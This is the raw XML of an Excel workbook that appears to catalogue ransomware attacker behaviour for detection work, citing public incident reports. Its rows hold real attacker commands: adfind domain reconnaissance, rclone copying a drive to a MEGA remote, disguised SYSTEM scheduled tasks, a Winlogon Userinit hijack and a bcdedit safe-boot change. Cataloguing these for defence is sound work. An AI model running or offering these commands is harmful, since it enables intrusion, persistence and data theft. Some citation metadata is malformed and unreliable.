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rveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{01EB7357-41A7-114B-828E-33425C6D4136}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
  </bookViews>
  <sheets>
    <sheet name="process_create" sheetId="1" r:id="rId1"/>
    <sheet name="process_access" sheetId="6" r:id="rId2"/>
    <sheet name="file_event" sheetId="7" r:id="rId3"/>
    <sheet name="winevt_4624" sheetId="8" r:id="rId4"/>
    <sheet name="winevt_7045" sheetId="9" r:id="rId5"/>
    <sheet name="mde" sheetId="13" r:id="rId6"/>
    <sheet name="generic" sheetId="5" r:id="rId7"/>
    <sheet name="pc_pivot" sheetId="3" r:id="rId8"/>
    <sheet name="pa_pivot" sheetId="10" r:id="rId9"/>
    <sheet name="file_pivot" sheetId="11" r:id="rId10"/>
    <sheet name="gen_pivot" sheetId="12" r:id="rId11"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="429" r:id="rId12"/>
    <pivotCache cacheId="430" r:id="rId13"/>
    <pivotCache cacheId="431" r:id="rId14"/>
    <pivotCache cacheId="432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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="178" uniqueCount="92">
  <si>
    <t>delta_pid</t>
  </si>
  <si>
    <t>process_cmdline</t>
  </si>
  <si>
    <t>initiating_process_cmdline</t>
  </si>
  <si>
    <t>process_name</t>
  </si>
  <si>
    <t>initiating_process_name</t>
  </si>
  <si>
    <t>data_object</t>
  </si>
  <si>
    <t>delta_eid</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>{ "date": "2024-09", "url": "https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of delta_eid</t>
  </si>
  <si>
    <t>Count of delta_pid</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>hscript</t>
  </si>
  <si>
    <t>file_action</t>
  </si>
  <si>
    <t>process_path</t>
  </si>
  <si>
    <t>initiating_process_path</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>sub_sid</t>
  </si>
  <si>
    <t>logon_type</t>
  </si>
  <si>
    <t>logon_process_name</t>
  </si>
  <si>
    <t>src_process</t>
  </si>
  <si>
    <t>src_process_path</t>
  </si>
  <si>
    <t>tgt_process</t>
  </si>
  <si>
    <t>tgt_process_path</t>
  </si>
  <si>
    <t>access</t>
  </si>
  <si>
    <t>trace</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>sub_account</t>
  </si>
  <si>
    <t>{ "data": "2024-06", "url": "https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>initiating_file_name</t>
  </si>
  <si>
    <t>{ "data": "2025-03", "url": "hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/", "tags": ["BlackSuit"]}</t>
  </si>
  <si>
    <t>service_name</t>
  </si>
  <si>
    <t>start_type</t>
  </si>
  <si>
    <t>{ "data": "2024-08", "url": "https://thedfirreport.com/2024/08/26/blacksuit-ransomware/", "tags": ["BlackSuit"]}</t>
  </si>
  <si>
    <t>service_file_name</t>
  </si>
  <si>
    <t>initiating_process_name_parent</t>
  </si>
  <si>
    <t>service_account</t>
  </si>
  <si>
    <t>{ "data": "2022-03-17", "url": "https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/", "tags": ["blackmatter", "blackcat"]}</t>
  </si>
  <si>
    <t>{ "data": "2022-06-22", "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "tags": ["alphv", "blackcat"]}</t>
  </si>
  <si>
    <t>{ "data": "2023-01012", "url": "https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>{ "data": "2023-12-19", "url": "https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>{  "date": "2021", "url": "https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt</t>
  </si>
  <si>
    <t>adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt</t>
  </si>
  <si>
    <t>{"date": "2020-10": "https://thedfirreport.com/2020/10/08/ryuks-return/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"date": "2020-10": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"date": "2021-01": "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>initiating_file_path</t>
  </si>
  <si>
    <t>{"date": "2021-05": "https://thedfirreport.com/2021/05/12/conti-ransomware/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-08": "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-09", "url": "https://talosintelligence.com/resources/269", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-09"url": "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-10": "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{"date": "2021-11": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"date": "2022-04"url": "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "tags": ["conti"]}</t>
  </si>
  <si>
    <t>{ "data": "2022-06", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "tags": ["conti", "cl0p", "hive", "ryuk", "lockbit", "blackbyte", "blackcat", "ragnarlocker"]}</t>
  </si>
  <si>
    <t>adfind.exe -sc dclist &gt; dclist.txt</t>
  </si>
  <si>
    <t>adfind.exe -sc domainlist &gt; domainlist.txt</t>
  </si>
  <si>
    <t>adfind.exe -sc computers_pwdnotreqs &gt; computers_pwdnotreqd.txt</t>
  </si>
  <si>
    <t>adfind.exe -f "objectcategory=person" &gt; ad_users.txt</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=subnet)" &gt; subnets.txt</t>
  </si>
  <si>
    <t>adfind.exe -sc trustdmp &gt; trustdmp.txt</t>
  </si>
  <si>
    <t>adfind.exe -sc dcmodes  &gt; dcmodes.txt</t>
  </si>
  <si>
    <t>adfind.exe -sc adinfo  &gt; adinfo.txt</t>
  </si>
  <si>
    <t>{"date": "2020-05-08" , "url": "https://thedfirreport.com/2020/05/08/adfind-recon/"}</t>
  </si>
  <si>
    <t>C:Users.configrclonerclone.conf</t>
  </si>
  <si>
    <t>{ "data": "2021-05", "url": "https://www.nccgroup.com/us/research-blog/detecting-rclone-an-effective-tool-for-exfiltration/"}</t>
  </si>
  <si>
    <t>rclone.exe config create remote mega user [redacted]@outlook.com pass [redacted]</t>
  </si>
  <si>
    <t>rclone.exe config</t>
  </si>
  <si>
    <t>rclone.exe copy E: remote:data</t>
  </si>
  <si>
    <t>htool-eid0001</t>
  </si>
  <si>
    <t>htool-eid0002</t>
  </si>
  <si>
    <t>htool-eid0003</t>
  </si>
  <si>
    <t>htool-eid0004</t>
  </si>
  <si>
    <t>htool-eid0005</t>
  </si>
  <si>
    <t>htool-eid0006</t>
  </si>
  <si>
    <t>htool-eid0007</t>
  </si>
  <si>
    <t>htool-eid0008</t>
  </si>
  <si>
    <t>htool-eid0009</t>
  </si>
  <si>
    <t>htool-eid0010</t>
  </si>
  <si>
    <t>htool-eid0011</t>
  </si>
  <si>
    <t>htool-eid0012</t>
  </si>
  <si>
    <t>htool-eid0013</t>
  </si>
  <si>
    <t>htool-eid0014</t>
  </si>
  <si>
    <t>process_account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</si>
</sst>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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="20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92D05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00B0F0"/>
        </patternFill>
      </fill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5" tint="-0.499984740745262"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="5" tint="-0.249977111117893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7" tint="-0.249977111117893"/>
        </patternFill>
      </fill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3" tint="0.499984740745262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 Wargo" refreshedDate="45778.448513773146" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="766" xr:uid="{FF071065-5305-A843-BC0E-8956AD2AA9CE}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="12">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="process_cmdline" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="process_name" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_name" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="process_path" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_path" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="user_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsBlank="1" count="19" longText="1">
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}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 Wargo" refreshedDate="45778.448513888892" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="11" xr:uid="{2DA1FF8F-64C6-3E47-98A5-D101103E385C}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table3"/>
  </cacheSource>
  <cacheFields count="11">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process_path" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process_path" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="access" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="trace" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="6">
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}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 Wargo" refreshedDate="45778.448514004631" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="52" xr:uid="{5CA93B16-8AF6-1046-BA3C-1426CD47B8CD}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table4"/>
  </cacheSource>
  <cacheFields count="10">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="file_action" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="file_path" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_name" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_path" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="9" longText="1">
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}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 Wargo" refreshedDate="45778.44851412037" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="123" xr:uid="{18FB9807-E196-9540-BE4B-38DD33FA94D8}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table5"/>
  </cacheSource>
  <cacheFields count="8">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="htool" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="hscript" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="c2" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsBlank="1" count="19">
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}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6">
  <r>
    <s v="procc-eid0001"/>
    <m/>
    <m/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0002"/>
    <m/>
    <m/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /SC ONSTART /F"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0003"/>
    <m/>
    <m/>
    <s v="schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0004"/>
    <m/>
    <m/>
    <s v="cmd.exe /C reg add &quot;HKLM\software\microsoft\windows nt\currentversion\winlogon&quot; /v UserInit /t reg_sz /d &quot;c:\windows\system32\userinit.exe,c:\users\[REDACTED]\appdata\local\notepad\UpdateEdge.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0005"/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\cmd.exe /C rename pythonw.exe UpdateJson.exe"/>
    <s v="winlogon.exe"/>
    <m/>
    <s v="winlogon.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0006"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} safeboot network"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0007"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0008"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
